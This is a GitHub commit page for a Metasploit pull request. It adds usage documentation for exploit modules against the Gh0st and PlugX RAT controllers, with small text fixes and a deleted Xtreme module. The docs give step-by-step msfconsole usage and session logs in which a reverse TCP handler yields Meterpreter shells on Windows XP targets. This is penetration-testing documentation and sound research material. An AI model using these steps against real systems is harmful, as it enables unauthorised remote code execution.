Skip to content

Commit 33e1777

Browse files
Merge pull request #1 from h00die/updates
Modules cleanup and add docs
2 parents 234a95a + d05c401 commit 33e1777

File tree

5 files changed

+86
-127
lines changed

5 files changed

+86
-127
lines changed
Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
## Vulnerable Application
2+
3+
This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
4+
This vulnerability can allow remote code execution in the context of the user who ran it.
5+
6+
A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
7+
8+
## Verification Steps
9+
10+
1. Run the application
11+
2. Start msfconsole
12+
3. Do: `use exploit/windows/misc/gh0st`
13+
4. Do: `set rhost [ip]`
14+
5. Do: `exploit`
15+
6. Get a shell
16+
17+
## Options
18+
19+
**MAGIC**
20+
21+
This is the 5 character magic used by the server. The default is `Gh0st`
22+
23+
## Scenarios
24+
25+
### Windows XP SP3 with gh0st 3.6
26+
27+
```
28+
msf > use exploit/windows/misc/gh0st
29+
msf exploit(gh0st) > set rhost 192.168.2.108
30+
rhost => 192.168.2.108
31+
msf exploit(gh0st) > exploit
32+
33+
[*] Started reverse TCP handler on 1.2.3.4:4444
34+
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
35+
[*] 1.2.3.1.108:80 - Spraying heap...
36+
[*] 1.2.3.1:80 - Trying command 103...
37+
[*] Sending stage (956991 bytes) to 1.2.3.1
38+
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
39+
[*] 1.2.3.1:80 - Server closed connection
40+
41+
meterpreter >
42+
```
Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
## Vulnerable Application
2+
3+
This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
4+
This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
5+
6+
A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
7+
8+
## Verification
9+
10+
1. Run the application
11+
2. Start msfconsole
12+
3. Do: `use exploit/windows/misc/plugx`
13+
4. Do: `set rhost [ip]`
14+
5. Do: `set target [target]`
15+
6. Do: `exploit`
16+
7. Click OK for the "PeDecodePacket" pop-up on the target
17+
8. Get a shell
18+
19+
## Scenarios
20+
21+
### Windows XP SP3 with PlugX type 1
22+
23+
```
24+
msf > use exploit/windows/misc/plugx
25+
msf exploit(plugx) > set rhost 1.2.3.4
26+
rhost => 1.2.3.4
27+
msf exploit(plugx) > set target 1
28+
target => 1
29+
msf exploit(plugx) > set verbose true
30+
verbose => true
31+
msf exploit(plugx) > exploit
32+
33+
[*] Started reverse TCP handler on 1.2.3.99:4444
34+
[*] 1.2.3.4:13579 - Trying target PlugX Type I...
35+
[*] 1.2.3.4:13579 - waiting for response
36+
[*] Sending stage (956991 bytes) to 1.2.3.4
37+
[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
38+
[*] 1.2.3.4:13579 - Server closed connection
39+
40+
meterpreter > getuid
41+
Server username: WINXP\user
42+
```

modules/exploits/windows/misc/gh0st.rb

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -42,7 +42,7 @@ def initialize(info = {})
4242

4343
register_options(
4444
[
45-
OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
45+
OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
4646
Opt::RPORT(80)
4747
]
4848
)
@@ -82,7 +82,6 @@ def validate_response(data)
8282
print_status('Packet decompress failure')
8383
return false
8484
end
85-
# print_status(msg.ord.to_s)
8685
return true
8786
end
8887

modules/exploits/windows/misc/plugx.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -162,7 +162,7 @@ def exploit
162162
connect
163163
sock.put(pkt)
164164

165-
print_status('waiting for response')
165+
print_status('Waiting for response')
166166
validate_response(sock.get_once)
167167
disconnect
168168

modules/exploits/windows/misc/xtreme.rb

Lines changed: 0 additions & 124 deletions
This file was deleted.

0 commit comments

Comments
 (0)